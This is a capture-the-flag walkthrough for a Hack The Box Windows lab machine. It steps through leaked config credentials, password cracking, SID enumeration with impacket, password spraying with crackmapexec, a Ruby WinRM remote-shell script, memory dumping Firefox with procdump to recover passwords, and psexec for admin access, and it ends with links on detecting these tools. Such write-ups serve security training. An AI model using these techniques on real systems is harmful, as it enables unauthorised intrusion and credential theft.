Retrieved from https://www.hackthebox.eu/home/machines/profile/201

1) Enumeration will show you running web server. Additionally, it's important to note SMB and WinRM are also running . We will leverage these once we get a hold of some credentials.

2) Web server has a login page -> I didn't try username/password combination and proceeded to "Login as guest". The page has a publicly available conversation between "Hazard" and "Support Admin" in issues.php. Additionally, there is an attachment within this conversation. The attachment contains some credzzz. Be sure to crack all of them if time permits. I used this site for the type 7 password: <http://www.ifm.net.nz/cookbooks/passwordcracker.html>

login.php
Configs == Creds?

3) Lookupsids.py an impacket tool that serves as a Windows SID bruteforcer example through [MS-LSAT] MSRPC Interface, aiming at finding remote users/groups. With the following set of credentials  (hazard:stealth1agent), we can enumerate usernames from the target host.

root@pwnbox:/opt/arod/Uti1s/impacket# /opt/arod/utils/impacket/examples/lookupsid.py 
Impacket vO.9.20-dev 
Copyright 2019 SecureAuth Corporation 
Brute forcing SIDS at 10.10.10.149 
StringBinding ncacn np:10.10.10. 
Domain SID is: S-1-5-21-4254423774-1266059056-3197185112 
SUPPORTDESK\Administrator (SidTypeuser) 
500: 
SUPPORTDESK\Guest (SidTypeuser) 
501: 
SUPPORTDESK\Defau1tAccount (SidTypeuser) 
503: 
SUPPORTDESK\WDAGUti1itYAccount (SidTypeuser) 
504 : 
SUPPORTDESK\None (SidTypecroup) 
513: 
SUPPORTDESK\Hazard (SidTypeuser) 
1008: 
SUPPORTDESK\support (SidTypeuser) 
1009: 
SUPPORTDESK\Chase (SidTypeuser) 
1012: 
SUPPORTDESK\Jason (SidTypeuser) 
1013:
lookupsid.py

4) With a list of potential usernames and a list of potential passwords... you can use crackmapexec to automate login attempts via SMB or winRM. Below is the whole screenshot of what this looked like :). It stops once it authenticates with a valid set of credentials. Chase:<bunch of garble>

Crackmapexec can be found here -> https://github.com/byt3bl33d3r/CrackMapExec

5) I use my go-to WinRM Shell just to keep it different. I simple change the credentials and IP address and call it a day.

require ' wlnrm' 
conn = WinRM: :Connection.new( 
endpoint: 
'http://10.10.10.149:5985/wsman' , 
. 'Chase' , 
user• 
password: 'Q4) 
command;" " 
conn.shell( :powershell) do I shell I 
until command 
"exit\n" do 
print "PS > " 
command = 
gets 
output = shell. run(command) 
STDOUT.print stdout 
STDERR.print stderr 
end 
end 
do 
Istdout, 
stderrl 
puts "Exiting with code #{output.exitcode}" 
end
https://github.com/WinRb/WinRM

6) Running processes show firefox is running. Using procdump, we are able to dump the PID to see if we can find some creds in there (Spoiler alert. We find creds).

PS ./procdump64. exe 
Sysinternals process dump utility 
ProcDump v9.O 
Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards 
Sysinternals - www.sysinternals.com 
.40:40] 
.40:40] 
-ma 420 
-accepteula 
[05. 
[05. 
Dump 
Dump 
Dump 
Dump 
1 initiated: 190901 054037 .dmp 
1 writing: Estimated dump file size is 295 MB. 
1 complete: 296 MB written in 2.8 seconds 
count reached.

7) I transfer the *.dmp file onto my Kali machine and user Strings for my initial swing at this. I also grep for the word "password" and poof... #magic. We can see some creds being passed. "login_password" is the variable being.

8) You can use crackmapexec for the last part of this... or if you get bored, switch to some psexec action. Pretty simple. Use either tool to get your shell or simple run commands. Both of these generate plenty of artifacts on your  target systems so be sure to research those if you have OPSEC considerations.  Below are some links I found if you want to look more into psexec detection:

Detecting CrackMapExec (CME) with Bro, Sysmon, and Powershell logs
CrackMapExec is a popular tool that is used by attackers to move laterally throughout an environment. I use it personally on my penetration tests, as I’ve found that it does a really good job at moving from system to system without detection. My goal with this blog post is to give defenders some te…
How To Threat Hunt For PsExec, Other Lateral Movement Tools
Adversaries often use PsExec for lateral movement. Threat hunters should look out for certain named pipes, binary metadata, registry keys, and more.
Threat Hunting #3 - Detecting PsExec execution using event 5145
PsExec is a light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console a...
crackmapexec & psexec

Thank you all for reading this. Until next time!